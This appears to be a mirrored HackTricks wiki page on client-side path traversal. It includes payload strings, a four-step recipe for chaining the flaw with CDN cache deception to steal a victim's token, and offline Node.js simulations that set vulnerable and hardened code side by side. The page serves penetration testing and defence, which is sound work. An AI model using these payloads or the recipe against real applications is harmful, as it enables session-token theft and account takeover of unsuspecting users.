mirror of https://github.com/HackTricks-wiki/hacktricks.git (synced 2025-10-10 18:36:50 +00:00)
# Client Side Path Traversal
{{#include ../banners/hacktricks-training.md}}
## Basic Information
A client-side path traversal (CSPT) occurs when you can **manipulate the path of a URL** that the application is going to **send to a user to visit in a legitimate way**, or that the user's browser is going to be **forced to request, for example via JS (fetch/XHR) or CSS**. Because the request is built and sent by the client with the victim's own cookies or headers, dot-segments (`../`) in the controlled part of the path retarget an authenticated request to a different endpoint on the same origin.

- In [**this writeup**](https://erasec.be/blog/client-side-path-manipulation/), it was possible to **change the invite URL** so it would end up **canceling a card**.
- In [**this writeup**](https://mr-medi.github.io/research/2022/11/04/practical-client-side-path-traversal-attacks.html), it was possible to combine a **client side path traversal via CSS** (it was possible to change the path where a CSS resource was loaded from) with an **open redirect** to load the CSS resource from an **attacker controlled domain**.
- In [**this writeup**](https://blog.doyensec.com/2024/07/02/cspt2csrf.html) a technique to abuse CSPT **to perform a CSRF attack** is shown. It works by **monitoring all the data an attacker can control** (URL path, parameters, fragment, data injected into the DB...) **and the sinks** where that data ends up (the requests being performed).
- Check [**this browser extension**](https://addons.mozilla.org/en-US/firefox/addon/eval-villain/) (Eval Villain) to monitor those sources and sinks.
- Check this [**CSPT playground**](https://github.com/doyensec/CSPTPlayground) to try the technique.
- Check [**this tutorial**](https://blog.doyensec.com/2024/12/03/cspt-with-eval-villain.html) on how to use the browser extension in the playground.
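
As an added example (not code from this page or from any of the linked writeups), the snippet below models the sink described above: SPA code that concatenates a value taken from the page URL into an API path. It resolves a few constructed payloads the way the browser's `fetch()` would, including percent-encoded dot-segments and a trailing `?` that pushes a fixed suffix out of the path, and shows one hardened builder beside the vulnerable one. The origin `app.example`, the `/api/v1/invites/<id>/accept` route and the `?invite=` parameter are hypothetical; it runs under Node.js, where the WHATWG `URL` class is global.

```javascript
// Added example, not code from the HackTricks page or the linked writeups.
// Origin, routes and parameter names are hypothetical.

const API_BASE = "https://app.example/api/v1/";

// Vulnerable pattern: an identifier taken from the page URL (e.g. ?invite=<id>)
// is concatenated into an API path and then fetched with the user's session.
// new URL() resolves dot-segments exactly the way the browser does before
// fetch()/XHR sends the request, so it is enough to model the sink.
function buildInviteUrlVulnerable(inviteId) {
  return new URL("invites/" + inviteId + "/accept", API_BASE);
}

// Hardened pattern: allowlist the identifier, percent-encode it, and verify the
// resolved path still lives under the intended prefix (defence in depth).
function buildInviteUrlHardened(inviteId) {
  if (!/^[A-Za-z0-9_-]{1,64}$/.test(inviteId)) {
    throw new Error("invalid invite id");
  }
  const url = new URL("invites/" + encodeURIComponent(inviteId) + "/accept", API_BASE);
  if (!url.pathname.startsWith("/api/v1/invites/")) {
    throw new Error("path escaped the invites prefix");
  }
  return url;
}

// Payloads an attacker could place in the ?invite= parameter of a link sent
// to the victim (constructed for this example).
const PAYLOADS = {
  // Plain dot-segments climb out of /invites/ into a sibling resource.
  plain: "../cards/42/cancel",
  // Percent-encoded dots are normalised as well: "%2e%2e" is a double-dot segment.
  encoded: "%2e%2e/cards/42/cancel",
  // A trailing "?" moves the fixed "/accept" suffix into the query string,
  // so the attacker fully controls the final path.
  truncating: "../cards/42/cancel?",
};

// Resolve every payload through the vulnerable builder and report where the
// authenticated request would actually be sent.
function demo() {
  const out = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    const u = buildInviteUrlVulnerable(payload);
    out[name] = { path: u.pathname, query: u.search };
  }
  return out;
}

console.log(demo());
try {
  buildInviteUrlHardened(PAYLOADS.plain);
} catch (e) {
  console.log("hardened builder rejected payload:", e.message);
}
console.log("hardened builder accepted:", buildInviteUrlHardened("inv_7f3a").href);
```

Note that every payload lands on `/api/v1/cards/42/cancel…`, outside the intended `/invites/` prefix, while the session cookie or `Authorization` header is still attached. The percent-encoded variant matters when a naive filter only looks for the literal string `../`.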
## CSPT-assisted web cache poisoning/deception
CSPT can be chained with extension-based CDN caching (a CDN that decides cacheability from a static-looking file extension rather than from the response) to exfiltrate sensitive JSON returned by authenticated API calls:

- A frontend concatenates user-controlled input into an API path and attaches authentication headers in fetch/XHR.
- By injecting dot-segments (../) you can retarget the authenticated request to a different endpoint on the same origin.
- If that endpoint (or a path variant with a static-looking suffix like .css) is cached by the CDN without varying on auth headers, the victim’s authenticated response can be stored under a public cache key and retrieved by anyone.
Quick recipe:
1) Find SPA code building API URLs from path parameters while sending auth headers.
2) Identify sensitive endpoints and test static suffixes (.css, .js, .jpg, .json) to see if the CDN flips to Cache-Control: public/max-age and X-Cache: Hit while returning JSON.
3) Lure the victim to a URL that injects traversal into the SPA parameter so the authenticated fetch hits the cacheable path variant (for example, ../../../v1/token.css).
4) Read back the same URL anonymously to obtain the cached secret (token → ATO).
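
The four steps above, as an added offline model that is not code from this page or from the referenced writeups. It wires together a constructed origin API, a CDN that caches by file extension without varying on `Authorization`, and the vulnerable SPA fetch; it then runs the chain once against a weak origin and once against an origin that marks API responses `Cache-Control: no-store`. The origin `app.example`, the `/api/v1/token` and `/api/v1/users/<id>/profile` routes, the router quirk that strips a static suffix, the session store and the token value are all hypothetical. Runs under Node.js.

```javascript
// Added example, not code from the HackTricks page or the linked writeups.
// Origin, routes, cache rules, sessions and tokens are constructed here.

const API_BASE = "https://app.example/api/v1/";
const STATIC_EXT = /\.(css|js|jpg|json)$/;

// Constructed session store: bearer value -> secret that /api/v1/token
// returns to the authenticated caller.
const SESSIONS = { "sess-victim": "tok_victim_4f9c" };

// Origin API. `hardened` controls whether API responses carry
// Cache-Control: no-store. The router strips a trailing static extension
// (hypothetical format-suffix quirk), which is why /api/v1/token.css answers
// exactly like /api/v1/token.
function makeOrigin({ hardened }) {
  return function origin(req) {
    const base = req.path.replace(STATIC_EXT, "");
    const headers = { "content-type": "application/json" };
    if (hardened) headers["cache-control"] = "no-store";
    const bearer = (req.headers.authorization || "").replace(/^Bearer /, "");
    if (base === "/api/v1/token") {
      if (!SESSIONS[bearer]) return { status: 401, headers, body: "" };
      return { status: 200, headers, body: JSON.stringify({ token: SESSIONS[bearer] }) };
    }
    const m = base.match(/^\/api\/v1\/users\/([^/]+)\/profile$/);
    if (m) return { status: 200, headers, body: JSON.stringify({ user: m[1] }) };
    return { status: 404, headers, body: "" };
  };
}

// CDN in front of the origin: stores any 200 whose path looks static, keyed on
// path+query only (no Vary on Authorization), unless the origin says no-store.
// That extension rule is the misconfiguration the chain abuses.
class Cdn {
  constructor(origin) { this.origin = origin; this.cache = new Map(); }
  handle(req) {
    const key = req.path + req.search;
    const looksStatic = STATIC_EXT.test(req.path);
    if (looksStatic && this.cache.has(key)) return { ...this.cache.get(key), xCache: "HIT" };
    const resp = this.origin(req);
    const noStore = /no-store/.test(resp.headers["cache-control"] || "");
    if (looksStatic && resp.status === 200 && !noStore) this.cache.set(key, resp);
    return { ...resp, xCache: "MISS" };
  }
}

// Vulnerable SPA code (step 1): the user id comes from the page URL and is
// concatenated into the API path; the request carries the session. new URL()
// applies the same dot-segment resolution the browser's fetch() does, and the
// fragment (everything after '#') is never sent to the server.
function spaFetchProfile(cdn, userParam, session) {
  const url = new URL("users/" + userParam + "/profile", API_BASE);
  return cdn.handle({
    path: url.pathname,
    search: url.search,
    headers: session ? { authorization: "Bearer " + session } : {},
  });
}

// Steps 3 and 4. The '#' in the payload pushes the fixed "/profile" suffix
// into the fragment, so the resolved path is exactly /api/v1/token.css.
function runChain({ hardened }) {
  const cdn = new Cdn(makeOrigin({ hardened }));
  // Step 3: the victim opens the attacker's link; the SPA fetches with the victim's session.
  const victim = spaFetchProfile(cdn, "../token.css#", "sess-victim");
  // Step 4: the attacker requests the same URL with no credentials.
  const attacker = cdn.handle({ path: "/api/v1/token.css", search: "", headers: {} });
  // Control: the un-suffixed endpoint never looks static, so it is never cached.
  const control = cdn.handle({ path: "/api/v1/token", search: "", headers: {} });
  return { victim, attacker, control };
}

console.log("weak origin:", runChain({ hardened: false }));
console.log("no-store origin:", runChain({ hardened: true }));
```

Against the weak origin the victim's request is a `MISS` that populates the cache and the attacker's anonymous read is a `HIT` containing the victim's token; with `Cache-Control: no-store` on API responses the CDN never stores the JSON and the anonymous read falls through to a 401. In a real test, step 2 of the recipe is exactly this comparison: the same endpoint with and without a static suffix, watching `Cache-Control` and `X-Cache` on the response.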
See details and mitigations in the Cache Deception page: [Cache Poisoning and Cache Deception](cache-deception/).
## References
- [Cache Deception + CSPT: Turning Non Impactful Findings into Account Takeover](https://zere.es/posts/cache-deception-cspt-account-takeover/)
- [CSPT overview by Matan Berson](https://matanber.com/blog/cspt-levels/)
- [PortSwigger: Web Cache Deception](https://portswigger.net/web-security/web-cache-deception)
{{#include ../banners/hacktricks-training.md}}